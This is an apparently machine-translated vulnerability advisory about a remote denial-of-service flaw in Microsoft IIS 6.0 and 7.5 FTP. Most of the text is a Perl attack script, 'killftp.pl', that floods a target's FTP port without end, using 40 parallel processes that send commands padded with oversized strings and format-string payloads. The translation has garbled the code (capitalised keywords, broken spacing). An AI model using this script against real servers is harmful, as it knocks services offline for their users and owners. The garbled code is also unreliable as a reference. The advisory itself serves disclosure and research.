Release date:
Updated on:
Affected Systems:
Microsoft IIS 7.5
Microsoft IIS 6.0
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54276
Internet Information Services (IIS) is a basic Internet service provided by Microsoft based on Microsoft Windows.
Microsoft IIS 6.0 and 7.5 have a remote security vulnerability. Attackers can exploit this vulnerability to cause the affected applications to not respond.
<* Source: coolkaveh
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Coolkaveh () provides the following test methods:
#! /Usr/bin/perl-w
Use IO: Socket;
Use Parallel: ForkManager;
$ | = 1;
Sub usage {
Print "Please DISABLE firewall daemon of this operating system first! \ N ";
Print "FTP Server Remote Denial Of Service \ n ";
Print "by coolkaveh \ n ";
Print "usage: perl killftp. pl Print "example: perl killftp. pl www.example.com \ n" ;}$ host = shift; $ port = shift | "21"; if (! Defined ($ host )){
Print "Please DISABLE firewall daemon of this operating system first! \ N ";
Print "FTP Server Remote Denial Of Service \ n ";
Print "by coolkaveh \ n ";
Print "coolkaveh@rocketmail.com \ n ";
Print "usage: perl killftp. pl Print "example: perl killftp. pl www.example.com \ n ";
Exit (0 );
}
$ Check_first = IO: Socket: INET-> new (PeerAddr => $ host, PeerPort => $ port, Timeout => 60 );
If (defined $ check_first ){
Print "$ host-> $ port is alive. \ n ";
$ Check_first-> close;
}
Else {
Die ("$ host-> $ port is closed! \ N ");
}
@ Junk = ('A' x5, 'A' x17, 'A' x33, 'A' x65, 'A' x76, 'A' x129, 'A' x257, 'A 'x513, 'A' x1024, 'A' x2049, 'A' x4097, 'A' x8193,
'A 'x12288, '% s % p % x % d', '024d',' %. 2049d ',' % p % P', '% x % x',' % d % d ', '% s % s',' % 99999999999s ',
'% 08x',' % 20d', '% 20n',' % 20x', '% 20s ', '% s % s ', '% p % P ',
'% # 0123456x % 08x % x % s % p % d % n % o % u % c % h % l % q % j % z % Z % t % I % e % g % f % a % C % S % 08x % ', '% s' x129,' % x' x257, '-1', '0', '0x100 ',
'0x1000', '0x3fffffff', '0x7ffffffe ', '0x7fffffffff', '0x80000000', '0xfffffffe', '0xffffff', '0x10000', '0x100000', '1 ',
);
@ Command = (
'Nlst', 'cwd ', 'stor', 'RETR ',
'Mkd ', 'rds', 'dele', 'rnfr', 'rnto', 'LIST', 'mdtt', 'SIZE', 'STAT', 'acct ', 'help', 'Mode ',
'Appe', 'stru', 'SITE', 'site Index', 'type', 'Type A', 'Type E', 'Type l ', 'Type I ', 'nlst', 'cwd', 'stor', 'RETR', 'mkd ', 'rds', 'dele', 'rnfr ', 'rnto', 'LIST', 'mdtt', 'SIZE', 'STAT', 'acct ',
'Help', 'Mode', 'appe', 'stru', 'SITE', 'site Index', 'type', 'Type A', 'Type E ', 'Type l', 'Type I ', 'nlst', 'cwd', 'stor', 'RETR', 'mkd ', 'rds', 'dele ', 'rnf', 'rnto', 'LIST', 'mdtt ',
'SIZE', 'STAT', 'acct ', 'help', 'Mode', 'appe', 'stru', 'SITE', 'site
Index', 'type', 'Type A', 'Type E', 'Type l', 'Type I ', 'nlst', 'cwd', 'stor ', 'RETR', 'mkd ', 'rds ',
'Dele', 'rnf', 'rnto', 'LIST', 'mdtt', 'SIZE', 'STAT', 'acct', 'help', 'Mode ', 'appe ',
'Stru', 'SITE', 'site Index', 'type', 'Type A', 'Type E', 'Type l', 'Type I ', 'nlst', 'cwd ', 'stor', 'RETR', 'mkd', 'rds', 'dele ',
'Rnf', 'rnto', 'LIST', 'mdtt', 'SIZE', 'STAT', 'act', 'help', 'Mode', 'appe ', 'stru', 'SITE', 'site
Index', 'type', 'Type A', 'Type E ',
'Type l', 'Type I ', 'nlst', 'cwd', 'stor', 'RETR', 'mkd ', 'rds ',
'Dele', 'rnf', 'rnto', 'LIST', 'mdtt', 'SIZE', 'STAT', 'acct', 'help ',
'Mode', 'appe', 'stru', 'SITE', 'site Index', 'type', 'Type A', 'Type E', 'Type l ', 'Type I ', 'nlst', 'cwd', 'stor', 'RETR', 'mkd ', 'rds', 'dele', 'rnfr ', 'rnto', 'LIST', 'mdtt', 'SIZE', 'STAT', 'acct ',
'Help', 'Mode', 'appe', 'stru', 'SITE', 'site Index', 'type', 'Type A', 'Type E ', 'Type l', 'Type I ', 'nlst', 'cwd', 'stor', 'RETR', 'mkd ', 'rds', 'dele ', 'rnf', 'rnto', 'LIST', 'mdtt', 'SIZE', 'STAT', 'acct ',
'Help', 'Mode', 'appe', 'stru', 'SITE', 'site Index', 'type', 'Type A', 'Type E ', 'Type l', 'Type I ', 'nlst', 'cwd', 'stor', 'RETR', 'mkd ', 'rds', 'dele ', 'rnf', 'rnto', 'LIST', 'mdtt', 'SIZE', 'STAT', 'acct ', 'help', 'help', 'Mode ', 'appe', 'stru', 'SITE', 'site
Index', 'type ',
'Mode', 'appe', 'stru', 'SITE', 'site Index', 'type', 'Type A', 'Type E', 'Type l ', 'Type I ', 'nlst', 'cwd', 'stor', 'RETR', 'mkd ', 'rds', 'dele', 'rnfr ', 'rnto', 'LIST', 'mdtt', 'SIZE', 'STAT', 'act', 'help', 'Mode', 'appe', 'stru ', 'SITE', 'site
Index', 'type', 'Type A', 'Type E ',
'Type l', 'Type I ', 'nlst', 'cwd', 'stor', 'RETR', 'mkd ', 'rds', 'dele ', 'rnf', 'rnto', 'LIST', 'mdtt', 'SIZE', 'STAT', 'act', 'help ',
'Mode', 'appe', 'stru', 'SITE', 'site Index', 'type', 'Type A', 'Type E', 'Type l ', 'Type I ', 'nlst', 'cwd', 'stor', 'RETR', 'mkd ', 'rds', 'dele', 'rnfr ', 'rnto', 'LIST', 'mdtt', 'SIZE', 'STAT', 'act', 'help', 'Mode', 'appe', 'stru ', 'SITE', 'site
Index', 'type', 'Type ',
'Type E', 'Type l', 'Type I ', 'nlst', 'cwd', 'stor', 'retr ', 'mkd', 'rds ', 'dele', 'rnf', 'rnto', 'LIST', 'mdtt', 'SIZE', 'Rest'
);
Print "Dosing Server! \ N ";
$ Pm = new Parallel: ForkManager (40 );
While (1 ){
My $ pid = $ pm-> start and next;
COMMAND_LIST: foreach $ cmd (@ command ){
Foreach $ poc (@ junk ){
LABEL5: $ sock4 = IO: Socket: INET-> new (PeerAddr => $ host,
PeerPort => $ port, Proto => 'tcp ', Timeout => 30 );
If (defined ($ sock4 )){
$ Sock4-> send ("$ cmd". "". "$ poc \ r \ n", 0 );
$ Sock4-> recv ($ content, 0,900 );
}
}
}
$ Pm-> finish;
}
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Microsoft
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.microsoft.com/technet/security/